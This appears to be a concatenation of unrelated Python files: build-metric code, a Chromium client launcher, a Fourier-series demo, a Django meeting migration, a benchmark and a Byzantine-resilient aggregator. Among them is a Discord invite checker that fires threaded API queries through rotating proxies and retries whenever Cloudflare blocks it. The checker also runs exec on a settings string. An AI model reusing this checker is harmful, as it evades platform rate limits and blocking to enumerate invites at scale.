current = self._dependency_graph.get_attribute(internal,
self.Attributes.TOTAL_SIZE,
0)
self._dependency_graph.set_attribute(internal,
self.Attributes.TOTAL_SIZE,
current + subtree_size)
else:
subtree_sizes[internal] = 0
top_level_total_size += self._dependency_graph.get_attribute(top_level,
self.Attributes.TOTAL_SIZE)
self._dependency_graph.set_attribute(DependencyGraph.ROOT_NODE_LABEL,
self.Attributes.TOTAL_SIZE,
top_level_total_size)
def calculate_total_build_times(self):
"""
Calculates the "total build time" metric. The total build time for a
dependency node is the sum of build times of all its dependant top-level
nodes.
"""
logging.info('Calculating total build times...')
for label in self._dependency_graph.get_dependency_nodes():
self._dependency_graph.remove_attribute(label, self.Attributes.BUILD_TIME)
total_build_time = 0.0
for label in self._dependency_graph.get_top_level_nodes():
build_time = self._dependency_graph.get_attribute(
label,
self.Attributes.BUILD_TIME)
total_build_time += build_time
subtree = self._dependency_graph.traverse_pre_order(label)
for subtree_label in subtree:
if not self._is_pch_dependency(label, subtree_label):
current = self._dependency_graph.get_attribute(
subtree_label, self.Attributes.BUILD_TIME, default=0.0)
current += build_time
self._dependency_graph.set_attribute(
subtree_label,
self.Attributes.BUILD_TIME,
current)
self._dependency_graph.set_attribute(DependencyGraph.ROOT_NODE_LABEL,
self.Attributes.BUILD_TIME,
total_build_time)
def calculate_translation_units(self):
"""
Calculates the "translation units" metric. The metric value for
dependency nodes is the number of dependant top-level nodes.
"""
logging.info('Calculating translation units...')
for label in self._dependency_graph.traverse_post_order():
self._dependency_graph.remove_attribute(label, self.Attributes.TRANSLATION_UNITS)
total_translation_units = 0
for label in self._dependency_graph.get_top_level_nodes():
total_translation_units += 1
subtree = self._dependency_graph.traverse_pre_order(label)
for subtree_label in subtree:
if not self._is_pch_dependency(label, subtree_label):
current = self._dependency_graph.get_attribute(
subtree_label, self.Attributes.TRANSLATION_UNITS, default=0)
current += 1
self._dependency_graph.set_attribute(
subtree_label,
self.Attributes.TRANSLATION_UNITS,
current)
self._dependency_graph.set_attribute(DependencyGraph.ROOT_NODE_LABEL,
self.Attributes.TRANSLATION_UNITS,
total_translation_units)
def calculate_agg_build_time_dev(self):
"""
Calculates the "aggregated build time deviation" metric. This is the sum
of differences between the average build time and the build time of
all parents.
"""
logging.info('Calculating aggregated build time deviation...')
total_build_time = self._dependency_graph.get_attribute(DependencyGraph.ROOT_NODE_LABEL,
self.Attributes.BUILD_TIME)
total_tus = self._dependency_graph.get_attribute(DependencyGraph.ROOT_NODE_LABEL,
self.Attributes.TRANSLATION_UNITS)
avg_build_time = ((total_build_time / total_tus) if total_tus > 0 else 0)
for label in self._dependency_graph.traverse_pre_order():
tus = self._dependency_graph.get_attribute(label,
self.Attributes.TRANSLATION_UNITS)
if tus is not None:
total_build_time = self._dependency_graph.get_attribute(
label,
self.Attributes.BUILD_TIME)
avg_total_build_time = avg_build_time * tus
self._dependency_graph.set_attribute(label,
self.Attributes.AGG_BUILD_TIME_DEV,
total_build_time - avg_total_build_time)
def guess_project_names(self):
"""
Sets the project name attribute for all nodes, based on the directory the file
lies in.
"""
logging.info('Guessing project names for headers...')
directory_to_project = {}
for cpp_node in self._dependency_graph.get_top_level_nodes():
directory = os.path.dirname(
self._dependency_graph.get_attribute(cpp_node, self.Attributes.ABSOLUTE_PATH))
project = self._dependency_graph.get_attribute(cpp_node, self.Attributes.PROJECT)
if directory in directory_to_project:
if directory_to_project[directory] != project:
logging.error('cpp file %s from project %s in directory %s '
'inconsistent with the currently stored '
'project: %s', cpp_node, project, directory,
directory_to_project[project])
else:
directory_to_project[directory] = project
for node in self._dependency_graph.traverse_pre_order():
self._dependency_graph.set_attribute(node, self.Attributes.PROJECT,
self._guess_dependency_project(
node, directory_to_project))
def run_full_analysis(self):
"""Calculates all available metrics for the graph."""
self.calculate_file_sizes()
self.calculate_total_sizes()
self.calculate_total_build_times()
self.calculate_translation_units()
self.calculate_agg_build_time_dev()
self.guess_project_names()
| python |
#!/usr/bin/env python
#
# Copyright (c) 2010 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# runclient.py gets the chromoting host info from an input arg and then
# tries to find the authentication info in the .chromotingAuthToken file
# so that the host authentication arguments can be automatically set.
import os
import platform
auth_filepath = os.path.join(os.path.expanduser('~'), '.chromotingAuthToken')
script_path = os.path.dirname(__file__)
if platform.system() == "Windows":
# TODO(garykac): Make this work on Windows.
print 'Not yet supported on Windows.'
exit(1)
elif platform.system() == "Darwin": # Darwin == MacOSX
client_path = '../../xcodebuild/Debug/chromoting_simple_client'
else:
client_path = '../../out/Debug/chromoting_x11_client'
client_path = os.path.join(script_path, client_path)
# Read username and auth token from token file.
auth = open(auth_filepath)
authinfo = auth.readlines()
username = authinfo[0].rstrip()
authtoken = authinfo[1].rstrip()
# Request final 8 characters of Host JID from user.
# This assumes that the host is published under the same username as the
# client attempting to connect.
print 'Host JID:', username + '/chromoting',
hostjid_suffix = raw_input()
hostjid = username + '/chromoting' + hostjid_suffix.upper()
command = []
command.append(client_path)
command.append('--host_jid ' + hostjid)
command.append('--jid ' + username)
command.append('--token ' + authtoken)
# Launch the client
os.system(' '.join(command))
| python |
import numpy as np
import scipy.integrate as spi
import matplotlib.pyplot as plt
#t is the independent variable
P = 3. #period value
BT=-6. #initian value of t (time begin)
ET=6. #final value of t (time end)
FS=1000 #number of discrete values of t between BT and ET
#the periodic real-valued function f(t) with period equal to P to simulate an acquired dataset
f = lambda t: ((t % P) - (P / 2.)) ** 3
t_range = np.linspace(BT, ET, FS) #all discrete values of t in the interval from BT and ET
y_true = f(t_range) #the true f(t)
#function that computes the complex fourier coefficients c-N,.., c0, .., cN
def compute_complex_fourier_coeffs_from_discrete_set(y_dataset, N): #via Riemann sum; N is up to nthHarmonic
result = []
T = len(y_dataset)
t = np.arange(T)
for n in range(-N, N+1):
cn = (1./T) * (y_dataset * np.exp(-1j * 2 * np.pi * n * t / T)).sum()
result.append(cn)
return np.array(result)
#function that computes the complex form Fourier series using cn coefficients
def fit_func_by_fourier_series_with_complex_coeffs(t, C):
result = 0. + 0.j
L = int((len(C) - 1) / 2)
for n in range(-L, L+1):
c = C[n+L]
result += c * np.exp(1j * 2. * np.pi * n * t / P)
return result
FDS=20. #number of discrete values of the dataset (that is long as a period)
t_period = np.arange(0, P, 1/FDS)
y_dataset = f(t_period) #generation of discrete dataset
maxN=8
COLs = 2 #cols of plt
ROWs = 1 + (maxN-1) // COLs #rows of plt
plt.rcParams['font.size'] = 8
fig, axs = plt.subplots(ROWs, COLs)
fig.tight_layout(rect=[0, 0, 1, 0.95], pad=3.0)
fig.suptitle('simulated dataset with period P=' + str(P))
#plot, in the range from BT to ET, the true f(t) in blue and the approximation in red
for N in range(1, maxN + 1):
C = compute_complex_fourier_coeffs_from_discrete_set(y_dataset, N)
#C contains the list of cn complex coefficients for n in 1..N interval.
y_approx = fit_func_by_fourier_series_with_complex_coeffs(t_range, C) #y_approx contains the discrete values of approximation obtained by the Fourier series
#y_approx contains the discrete values of approximation obtained by the Fourier series
row = (N-1) // COLs
col = (N-1) % COLs
axs[row, col].set_title('case N=' + str(N))
axs[row, col].scatter(t_range, y_true, color='blue', s=1, marker='.')
axs[row, col].scatter(t_range, y_approx, color='red', s=2, marker='.')
plt.show()
| python |
#first, we import the required libraries
import threading, os, time, requests, yaml
from tkinter.filedialog import askopenfilename
from tkinter import Tk
from concurrent.futures import ThreadPoolExecutor
from console.utils import set_title
from timeit import default_timer as timer
from datetime import timedelta, datetime
from colored import fg
#if results folder doesnt exist, make one
if not os.path.exists("Results"):
os.mkdir("Results")
class vars: #we store basically every variable in this class called vars
threads = None
timeout = None
proxies = []
remaining = []
current_proxy = 0
combos = []
errors = 0
valid = 0
invalid = 0
blocked = 0
total = 0
checked = 0
cpm = 0
proxy_type = 'http'
combos_name = ''
min_members = None
max_verification = None
starttime = None
capture_message = None
color_scheme = None
refresh_delay = None
#if settings file doesnt exist, make one with default settings
if not os.path.exists("settings.yaml"):
with open("settings.yaml", "w") as f:
f.write('Threads: 200\nTimeout: 6 #seconds\nMinimum Members: 500\nMaximum Verification Level: 4\nColor Scheme Hex: 0236c7\nUI Refresh Delay: 1 #seconds\n'+r'Capture Message: "------------------------------------\n > Code: {code}\n > Server Name: {server_name}\n > Members: {member_count}\n > Verification Level: {verification_level}\n" #placeholders: code, server_name, server_description, server_id, member_count, verification_level, boosters | newline = \n | use placeholders like this: "placeholder: {put placeholder here}"')
with open("settings.yaml", "r") as f: #load settings from the settings file and store them inside the vars class
settings = yaml.safe_load(f)
vars.threads = settings['Threads']
vars.timeout = settings['Timeout']
vars.min_members = settings['Minimum Members']
vars.max_verification = settings['Maximum Verification Level']
vars.capture_message = settings['Capture Message']
try:
vars.color_scheme = fg(f"#{settings['Color Scheme Hex']}")
except:
vars.color_scheme = fg("#0236c7")
try:
vars.refresh_delay = int(settings['UI Refresh Delay'])
except:
try:
vars.refresh_delay = float(settings['UI Refresh Delay'])
except:
vars.refresh_delay = 1
class main: #this class is basically the brain of the program
def __init__(self):
self.start()
def clear(self):
os.system('cls') #simply clears console (calling this function requires 12 characters while calling the os command
# for clearing console requires 16, i think by saving those 4 characters we achieve a lot)
def logo(self):
self.clear()
print(f'''{vars.color_scheme} Favel\u001b[0m\n''') #i was too lazy to copy and paste something from an art gen
def check(self, keyword): #the keyword argument is the discord invite code
try:
proxy = vars.proxies[vars.current_proxy]
except:
vars.current_proxy = 0
proxy = vars.proxies[vars.current_proxy]
while 1: #repeat the process until we either get valid or invalid
while 1: #repeat until we get reply
try:
a = requests.get(f'https://discord.com/api/v9/invites/{keyword}?with_counts=true', proxies={'http': f"{vars.proxy_type}://{proxy}", 'https': f"{vars.proxy_type}://{proxy}"}, timeout=vars.timeout, headers={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36', 'pragma': 'no-cache', 'accept': '*/*'}) #sends the check request to the discord api
break
except: #if request fails
vars.current_proxy += 1
vars.errors += 1
try:
proxy = vars.proxies[vars.current_proxy]
except:
vars.current_proxy = 0
proxy = vars.proxies[vars.current_proxy]
if '"message": "Unknown Invite"' in a.text: #if account is invalid
vars.invalid += 1
break
elif "guild" in a.text and int(a.json()['approximate_member_count']) >= vars.min_members and int(a.json()['guild']['verification_level']) <= vars.max_verification: #if account is valid and meets the criteria
code = keyword
server_name = a.json()['guild']['name']
server_description = a.json()['guild']['description']
server_id = a.json()['guild']['id']
member_count = a.json()['approximate_member_count']
verification_level = a.json()['guild']['verification_level']
boosters = a.json()['guild']['premium_subscription_count']
vars.valid += 1
with open(f'Results\\{vars.starttime}\\capture.txt', "a", errors="replace") as f:
try:
exec(f'f.write(f{repr(vars.capture_message)})') #writes the capture message to the capture output file
except Exception as e:
with open("capture_error.log", "w") as f:
f.write(f"{e}\n\nCapture message: {repr(vars.capture_message)}")
with open(f"Results\\{vars.starttime}\\valid.txt", "a", errors="replace") as f:
f.write(f"{keyword}\n")
break
elif "Access denied | " in a.text or " Cloudflare" in a.text: #if request has been blocked by cloudflare
vars.blocked += 1
#we dont set quit to true because we want the checker to check the code again
vars.checked += 1 #adds +1 to checked variable so we can count remaining for ui
threading.Thread(target=self.cpm,).start() #adds +1 cpm (i know its bad to use threads for counting cpm, ill write a better counter if i have time)
vars.remaining.remove(keyword) #removes code from remaining list so we dont check it again
def cpm(self):
vars.cpm += 1 #adds one to cpm variable
time.sleep(60)#waits 60 seconds
vars.cpm -= 1 #removes the added cpm
def start(self):
self.logo()
Tk().withdraw() #we create a tkinter ui and instantly hide it, this is needed for the file loading
print(' Loading Proxies...')
loaded = False
while not loaded: #loop until user selects file
time.sleep(0.5)
try:
with open(askopenfilename(), 'r', errors='replace') as f:
lines = f.readlines()
for item in lines:
vars.proxies.append(item.strip())
loaded = True
except:
time.sleep(1)
self.logo()
print(f''' Proxy type:
{vars.color_scheme}<\u001b[0m1{vars.color_scheme}>\u001b[0m HTTP
{vars.color_scheme}<\u001b[0m2{vars.color_scheme}>\u001b[0m SOCKS4
{vars.color_scheme}<\u001b[0m3{vars.color_scheme}>\u001b[0m SOCKS5\n''')
ptype = input(f' {vars.color_scheme}<\u001b[0mQ{vars.color_scheme}>\u001b[0m ')
if "1" in ptype:
vars.proxy_type = "http"
elif "2" in ptype:
vars.proxy_type = "socks4"
elif "3" in ptype:
vars.proxy_type = "socks5"
temp_proxies = []
if '@' in vars.proxies[0]: #if proxies are auth proxies
for item in vars.proxies:
temp_proxies.append(item.split('@')[1]+"@"+item.split('@')[0]) #reverses auth proxy format, because for whatever reason the requests library requires it to be backwards
vars.proxies = temp_proxies
print('\nAuth proxy format: '+str(temp_proxies[0]))
print('Make sure it matches this: user:pass@ip:port')
input()
loaded = False
self.logo()
print(' Loading Keywords...')
while not loaded:
time.sleep(0.5)
vars.combos_name = askopenfilename()
try:
with open(vars.combos_name, 'r', errors='replace') as f:
lines = f.readlines()
for item in lines:
vars.combos.append(item.strip())
loaded = True
except:
time.sleep(1)
vars.starttime = datetime.today().strftime("%d-%m-%Y %H-%M-%S")
if not os.path.exists(f"Results\\{vars.starttime}"):
os.mkdir(f"Results\\{vars.starttime}")
vars.total = len(vars.combos)
vars.remaining = vars.combos
with ThreadPoolExecutor(max_workers=vars.threads) as exe:
self.clear()
print("Starting threads...")
for item in vars.combos:
if item.strip() != "": #if line is not empty
exe.submit(self.check, item) #submits the thread to the threadpool
vars.current_proxy += 1
threading.Thread(target=self.screen,).start() #after the threads have been added to the threadpool, we display the ui
#the reason why we dont display the ui before adding the threads to the threadpool is because
#it would be incredibly laggy, and would make adding threads even slower
def screen(self):
greenicon = '\u001b[32m[\u001b[0m~\u001b[32m]\u001b[0m'
yellowicon = '\u001b[33m[\u001b[0m~\u001b[33m]\u001b[0m'
redicon = '\u001b[31m[\u001b[0m~\u001b[31m]\u001b[0m'
blueicon = f'{vars.color_scheme}[\u001b[0m~{vars.color_scheme}]\u001b[0m'
start = timer()
while 1:
self.logo()
print('')
print(f' {greenicon} Valid ( {vars.valid} )')
print(f' {yellowicon} Invalid ( {vars.invalid} )')
print(f'\n {redicon} Errors ( {vars.errors} )')
print(f' {redicon} Blocked ( {vars.blocked} )')
print(f'\n {blueicon} CPM ( {vars.cpm} )')
print(f' {blueicon} Remaining ( {vars.total-vars.checked} )')
set_title(f'Favel Invite Checker | CPM: {vars.cpm} | {str(timedelta(seconds=timer()-start)).split(".")[0]} | Nandi') #its not cool to replace my name with yours
time.sleep(vars.refresh_delay)
os.system('cls')
if __name__ == '__main__':
main() | python |
# This is a dummy test file; delete it once the package actually has tests.
def test_import():
import qutip_tensornetwork
assert qutip_tensornetwork.__version__
| python |
import abc
from smqtk.utils.plugin import Pluggable
class DummyInterface (Pluggable):
@abc.abstractmethod
def inst_method(self, val):
""" test abstract method. """
| python |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
from django.db import migrations
def backfill_91_other_meetings(apps, schema_editor):
Meeting = apps.get_model('meeting', 'Meeting')
Schedule = apps.get_model('meeting', 'Schedule')
ScheduledSession = apps.get_model('meeting', 'ScheduledSession')
Room = apps.get_model('meeting', 'Room')
Group = apps.get_model('group', 'Group')
Person = apps.get_model('person', 'Person')
ietf91 = Meeting.objects.filter(number=91).first()
if not ietf91:
print "IETF91 not found, no data changed"
else:
agenda91 = Schedule.objects.get(meeting=ietf91,pk=ietf91.agenda.pk)
south_pacific_1 = Room.objects.get(meeting=ietf91,name="South Pacific 1")
south_pacific_2 = Room.objects.get(meeting=ietf91,name="South Pacific 2")
rainbow_12 = Room.objects.get(meeting=ietf91,name="Rainbow Suite 1/2")
lehua_suite = Room.objects.get(meeting=ietf91,name="Lehua Suite")
kahili = Room.objects.get(meeting=ietf91,name="Kahili")
coral_2 = Room.objects.get(meeting=ietf91,name="Coral 2")
south_pacific_3 = Room.objects.create(meeting=ietf91,name="South Pacific 3",capacity=20)
rainbow_suite_3 = Room.objects.create(meeting=ietf91,name="Rainbow Suite 3",capacity=20)
rainbow_23 = Room.objects.create(meeting=ietf91,name="Rainbow Suite 2/3",capacity=210)
south_pacific_34 = Room.objects.create(meeting=ietf91,name="South Pacific 3/4",capacity=210)
iolani_67 = Room.objects.create(meeting=ietf91,name="Iolani 6/7",capacity=40)
sea_pearl_12 = Room.objects.create(meeting=ietf91,name="Sea Pearl 1/2",capacity=40)
sea_pearl_2 = Room.objects.create(meeting=ietf91,name="Sea Pearl 2",capacity=20)
coral_lounge = Room.objects.create(meeting=ietf91,name="Coral Lounge", capacity=1200)
hibiscus = Room.objects.create(meeting=ietf91,name="Hibiscus", capacity=20)
tiare = Room.objects.create(meeting=ietf91,name="Tiare Suite", capacity=20)
iesg = Group.objects.get(acronym='iesg')
iab = Group.objects.get(acronym='iab')
rsoc = Group.objects.get(acronym='rsoc')
iaoc = Group.objects.get(acronym='iaoc')
nomcom = Group.objects.get(acronym='nomcom2014')
isoc = Group.objects.get(acronym='isoc')
secr = Group.objects.get(acronym='secretariat')
isocbot = Group.objects.create(acronym='isocbot',name="Internet Society Board of Trustees",state_id='active',type_id='isoc',parent=isoc)
isocfell = Group.objects.create(acronym='isocfell',name="Internet Society Fellows",state_id='active',type_id='isoc',parent=isoc)
system = Person.objects.get(name='(System)')
for d, h, m, duration, type_id, groups, room, slotname, label in [
( 9, 8, 0, 120, 'offagenda', [secr], rainbow_suite_3, 'WEIRDS Interop', 'WEIRDS Interop'),
( 9, 8, 30, 90, 'lead', [iesg], south_pacific_2, 'Breakfast', None),
( 9, 9, 0, 240, 'offagenda', [secr], lehua_suite, 'RMCAT Interim', 'RMCAT Interim Meeting'),
( 9, 9, 0, 60, 'lead', [nomcom], iolani_67, 'Breakfast', 'Nomcom Breakfast'),
( 9, 9, 0, 150, 'lead', [iesg], south_pacific_2, 'Meeting', None),
( 9, 9, 0, 360, 'offagenda', [secr], hibiscus, 'Meeting', 'RootOPS'),
( 9, 9, 30, 360, 'offagenda', [secr], kahili, 'TLS Interim', 'TLS WG Interim'),
( 9, 11, 0, 480, 'offagenda', [secr], coral_lounge, 'T-Shirt Distribution', 'T-shirt Distribution'),
( 9, 11, 30, 150, 'lead', [iesg], south_pacific_2, 'Lunch', 'IESG Lunch with the IAB'),
( 9, 11, 30, 150, 'lead', [iab], south_pacific_2, 'Lunch', 'IAB Lunch with the IESG'),
( 9, 12, 0, 360, 'offagenda', [secr], south_pacific_1, 'Terminal Room', 'Terminal Room Open to Attendees'),
( 9, 14, 0, 180, 'lead', [iab], south_pacific_2, 'Meeting', None),
( 9, 16, 0, 120, 'offagenda', [secr], coral_2, 'Meeting', 'Web Object Encryption'),
( 9, 17, 0, 120, 'offagenda', [secr], sea_pearl_12, 'Reception', "Companion's Reception"), # Should this appear on agenda?
( 9, 19, 0, 180, 'offagenda', [isocfell], rainbow_23, 'Dinner', 'ISOC Fellows Reception/Dinner'),
( 9, 19, 0, 180, 'offagenda', [secr], lehua_suite, 'Meeting', 'Huawei'),
( 9, 21, 0, 180, 'lead', [secr], sea_pearl_12, 'Gathering', 'AMS/IESG/IAB/IAOC Gathering'),
( 10, 0, 0, 1440, 'offagenda', [secr], south_pacific_1, 'Terminal Room', 'Terminal Room Open to Attendees'),
( 10, 7, 0, 120, 'lead', [iesg], south_pacific_2, 'Breakfast', 'IESG Breakfast with the IAB'),
( 10, 7, 0, 120, 'lead', [iab], south_pacific_2, 'Breakfast', 'IAB Breakfast with the IESG'),
( 10, 7, 0, 120, 'lead', [nomcom], iolani_67, 'Breakfast', 'Nomcom Breakfast'),
( 10, 8, 0, 600, 'offagenda', [secr], coral_lounge, 'T-shirt Distribution', 'T-shirt Distribution'),
( 10, 11, 30, 90, 'offagenda', [secr], south_pacific_2, 'Meeting', 'OPS Directorate Meeting'),
( 10, 11, 30, 90, 'offagenda', [secr], rainbow_suite_3, 'Meeting', 'IETF/3GPP Meeting'),
( 10, 11, 30, 90, 'offagenda', [secr], lehua_suite, 'Meeting', 'RTG Area Meeting'),
( 10, 19, 0, 240, 'offagenda', [secr], south_pacific_2, 'Meeting', 'Huawei'),
( 11, 0, 0, 1440, 'offagenda', [secr], south_pacific_1, 'Terminal Room', 'Terminal Room Open to Attendees'),
( 11, 7, 0, 120, 'lead', [iesg], south_pacific_2, 'Breakfast', None),
( 11, 7, 0, 120, 'lead', [nomcom], iolani_67, 'Breakfast', 'Nomcom Breakfast'),
( 11, 7, 0, 120, 'lead', [iab], rainbow_suite_3, 'Breakfast', None),
( 11, 7, 0, 60, 'lead', [iab], tiare, 'Meeting', 'Vendor Selection Committee Meeting'),
( 11, 8, 0, 600, 'offagenda', [secr], coral_lounge, 'T-shirt Distribution', 'T-shirt Distribution'),
( 11, 9, 0, 90, 'offagenda', [secr], south_pacific_2, 'Meeting', 'DHCPv6bis Team Meeting'),
( 11, 11, 30, 90, 'offagenda', [secr], south_pacific_2, 'Meeting', 'SECdir Meeting'),
( 11, 11, 30, 90, 'offagenda', [secr], rainbow_suite_3, 'Lunch', 'RSAG/ISEB Lunch'),
( 11, 16, 0, 240, 'offagenda', [secr], south_pacific_2, 'Meeting', 'Verisign Corporate Meeting'),
( 12, 0, 0, 1440, 'offagenda', [secr], south_pacific_1, 'Terminal Room', 'Terminal Room Open to Attendees'),
( 12, 7, 30, 90, 'lead', [iaoc], south_pacific_3, 'Breakfast', None),
( 12, 7, 0, 120, 'lead', [nomcom], iolani_67, 'Breakfast', 'Nomcom Breakfast'),
( 12, 8, 0, 540, 'offagenda', [secr], coral_lounge, 'T-shirt Distribution', 'T-shirt Distribution'),
( 12, 8, 0, 240, 'offagenda', [secr], south_pacific_2, 'Meeting', 'DIME WG'),
( 12, 11, 30, 90, 'offagenda', [secr], rainbow_suite_3, 'Lunch', 'RFC Editor Lunch'),
( 12, 15, 0, 120, 'offagenda', [secr], south_pacific_2, 'Meeting', 'YANG Advice'),
( 12, 17, 0, 240, 'offagenda', [secr], rainbow_suite_3, 'Meeting', 'Huawei (POC Wil Liu)'),
( 12, 20, 0, 150, 'offagenda', [secr], south_pacific_2, 'Meeting', 'ICANN SSAC'),
( 13, 0, 0, 1440, 'offagenda', [secr], south_pacific_1, 'Terminal Room', 'Terminal Room Open to Attendees'),
( 13, 7, 0, 120, 'lead', [iab], rainbow_suite_3, 'Breakfast', None),
( 13, 7, 0, 120, 'lead', [nomcom], iolani_67, 'Breakfast', 'Nomcom Breakfast'),
( 13, 11, 30, 90, 'lead', [iab], sea_pearl_2, 'Meeting', 'IAB Liaison Oversight'),
( 13, 11, 30, 90, 'lead', [rsoc], rainbow_suite_3, 'Lunch', None),
( 14, 0, 0, 900, 'offagenda', [secr], south_pacific_1, 'Terminal Room', 'Terminal Room Open to Attendees'),
( 14, 7, 0, 120, 'lead', [nomcom], iolani_67, 'Breakfast', 'Nomcom Breakfast'),
( 14, 11, 0, 360, 'offagenda', [isoc], south_pacific_34,'Meeeting', 'ISOC AC Meeting'),
( 14, 13, 30, 90, 'lead', [iesg], south_pacific_2, 'Lunch', 'IESG Lunch with the IAB'),
( 14, 13, 30, 90, 'lead', [iab], south_pacific_2, 'Lunch', 'IAB Lunch with the IESG'),
( 14, 18, 0, 60, 'offagenda', [isocbot], rainbow_23, 'Reception', 'ISOC Board Reception for IETF Leadership'),
( 14, 19, 0, 180, 'offagenda', [isocbot], rainbow_23, 'Dinner', 'ISOC Board Dinner for IETF Leadership'),
( 15, 8, 0, 60, 'offagenda', [isocbot], rainbow_12, 'Breakfast', 'ISOC Board of Trustees Breakfast'),
( 15, 8, 0, 540, 'offagenda', [isocbot], south_pacific_34,'Meeting', 'ISOC Board of Trustees Meeting'),
( 15, 12, 0, 60, 'offagenda', [isocbot], rainbow_12, 'Lunch', 'ISOC Board of Trustees Lunch'),
( 16, 8, 0, 60, 'offagenda', [isocbot], rainbow_12, 'Breakfast', 'ISOC Board of Trustees Breakfast'),
( 16, 8, 0, 540, 'offagenda', [isocbot], south_pacific_34,'Meeting', 'ISOC Board of Trustees Meeting'),
( 16, 12, 0, 60, 'offagenda', [isocbot], rainbow_12, 'Lunch', 'ISOC Board of Trustees Lunch'),
]:
ts = ietf91.timeslot_set.create(type_id=type_id, name=slotname,
time=datetime.datetime(2014,11,d,h,m,0),
duration=datetime.timedelta(minutes=duration),
location=room,show_location=(type_id not in ['lead','offagenda']))
for group in groups:
session = ietf91.session_set.create(name= label or "%s %s"%(group.acronym.upper(),slotname),
group=group, attendees=25,
requested=datetime.datetime(2014,11,1,0,0,0),
requested_by=system, status_id='sched')
ScheduledSession.objects.create(schedule=agenda91, timeslot=ts, session=session)
class Migration(migrations.Migration):
dependencies = [
('meeting', '0005_auto_20150430_0847'),
('name', '0004_auto_20150318_1140'),
('group', '0004_auto_20150430_0847'),
('person', '0004_auto_20150308_0440'),
]
operations = [
migrations.RunPython(backfill_91_other_meetings)
]
| python |
import csv
import os
import time
import pytest
from conftest import params
from pygraphblas import *
from src.RegularPathQuering import rpq
@pytest.mark.parametrize('impl,graph,regex', params)
def test_benchmark_rpq(impl, graph, regex):
impl_name = impl['name']
g = impl['impl'].from_txt(graph['graph'])
g_name = graph['name']
r = impl['impl'].from_regex(regex['regex'])
r_name = regex['name']
result_file = f'{g_name}.csv'
result_file_path = f'./benchmarks/benchmark_rpq/results/{result_file}'
headers = [
'Implementation'
, 'Graph'
, 'Regex'
, 'Time (in microseconds)'
, 'Control sum'
]
if not os.path.exists(result_file_path):
with open(result_file_path, mode='w+', newline='\n') as f:
csv_writer = csv.writer(f, delimiter=',', quoting=csv.QUOTE_NONNUMERIC, escapechar=' ')
csv_writer.writerow(headers)
with open(result_file_path, mode='a+', newline='\n', buffering=1) as f:
csv_writer = csv.writer(f, delimiter=',', quoting=csv.QUOTE_NONNUMERIC, escapechar=' ')
start_time = time.time_ns()
res = rpq(g, r)
end_time = time.time_ns()
result_time = (end_time - start_time) // (10 ** 3)
results = [impl_name, g_name, r_name, result_time, res.select(lib.GxB_NONZERO).nvals]
csv_writer.writerow(results)
| python |
"""
Allen-Zhu Z, Ebrahimian F, Li J, et al. Byzantine-Resilient Non-Convex Stochastic Gradient Descent[J].
arXiv preprint arXiv:2012.14368, 2020.
"""
import torch
import random
from .base import _BaseAggregator
from ..utils import log
class Safeguard(_BaseAggregator):
"""[summary]
Args:
_BaseAggregator ([type]): [description]
"""
def __init__(self, T0, T1, th0, th1, nu, tuningThreshold=False, reset=False):
assert T1 >= T0 >= 1
assert th1 > th0 > 0
self.T0 = T0
self.T1 = T1
self.th0 = th0
self.th1 = th1
self.nu = nu
# reset good set every T1 step
self.reset = reset
self.good = None
# The length of histA should be less than T1
# The element of histA is a list
self.histA = []
# The length of histB should be less than T0
self.histB = []
self.histIndices = []
self.tuningThreshold = tuningThreshold
self.thresholdHistory = {}
def add_to_threshold_hist(self, threshold_name, value):
if threshold_name not in self.thresholdHistory:
self.thresholdHistory[threshold_name] = {}
reformatted_value = "{:.1f}".format(value)
self.thresholdHistory[threshold_name][reformatted_value] = (
self.thresholdHistory[threshold_name].get(reformatted_value, 0) + 1
)
sorted_values = sorted(
self.thresholdHistory[threshold_name].items(), key=lambda x: -x[1]
)
log("=> {} {}".format(threshold_name, sorted_values[:3]))
def adjust_threshold(self, d2m, good, threshold, threshold_name):
"""
Args:
d2m (dict): index -> distance to median. length of all workers.
good (list): The list of current good worker indices.
threshold_name (str): name of the threshold
"""
m = len(d2m)
sorted_values = sorted(d2m.values())
# print(
# "adjust_threshold {}".format(
# ["{:.3f}".format(i.item()) for i in sorted_values]
# )
# )
# Requirement 1: At least half of the workers satisfies d2m[i] <= threshold
candidate_threshold = sorted_values[m // 2] + 0.001
# print(
# "==> {:.1f} {}".format(
# candidate_threshold, ["{:.1f}".format(i.item()) for i in sorted_values]
# )
# )
# Requirement 2: At least one worker in good set is 2 times greater than the threshold
# if any(d2m[i] > 2 * candidate_threshold for i in good):
# # Round to first decimal point
# value = torch.ceil(candidate_threshold * 10) / 10
# self.add_to_threshold_hist(threshold_name, value)
# print(
# "!!!=> {} {:.1f} | {:.1f}".format(
# threshold_name, candidate_threshold, candidate_threshold
# )
# )
# return candidate_threshold
# else:
# print(
# "!!!=> {} {:.1f} | {:.1f}".format(
# threshold_name, candidate_threshold, threshold
# )
# )
# return threshold
# Round to first decimal point
value = torch.ceil(candidate_threshold * 10) / 10
self.add_to_threshold_hist(threshold_name, value)
return candidate_threshold
def compute_distance(self, v1, v2):
return (v1 - v2).norm()
def __str__(self):
return "Safeguard(T0={},T1={},th0={},th1={},nu={})".format(
self.T0, self.T1, self.th0, self.th1, self.nu
)
def find_median_grad(self, grads, threshold, m):
"""[summary]
Args:
grads (dict): node_idx -> gradient
threshold (float): threshold
m (int): number of total nodes
"""
indices = list(grads.keys())
# Since in the experiment we assume the workers indices [0, n-f) are good
# and [n-f, n) are Byzantine. Shuffling removes the bias.
random.shuffle(indices)
distances = {}
counts = {}
for i in indices:
count = 0
for j in indices:
idx = tuple(sorted([i, j]))
distance = self.compute_distance(grads[i], grads[j]).item()
distances[idx] = distances.get(idx, distance)
if distances[idx] <= threshold:
count += 1
if count >= m / 2:
print(
"\nhistA={} | Find median {} among indices={} threshold={} distances={}\n".format(
len(self.histA), i, indices, threshold, distances
)
)
return grads[i]
counts[i] = count
# If no one over m / 2
print(f"counts={counts}")
sorted_counts = sorted(counts.items(), key=lambda x: -x[1])[0]
max_count_indices = []
for k, v in counts.items():
if v == sorted_counts[1]:
max_count_indices.append(k)
random.shuffle(max_count_indices)
print(
"\nhistA={} | (Not Found) Find median {} indices={} threshold={} distances={} max_count_indices={}\n".format(
len(self.histA),
max_count_indices[0],
indices,
threshold,
distances,
max_count_indices,
)
)
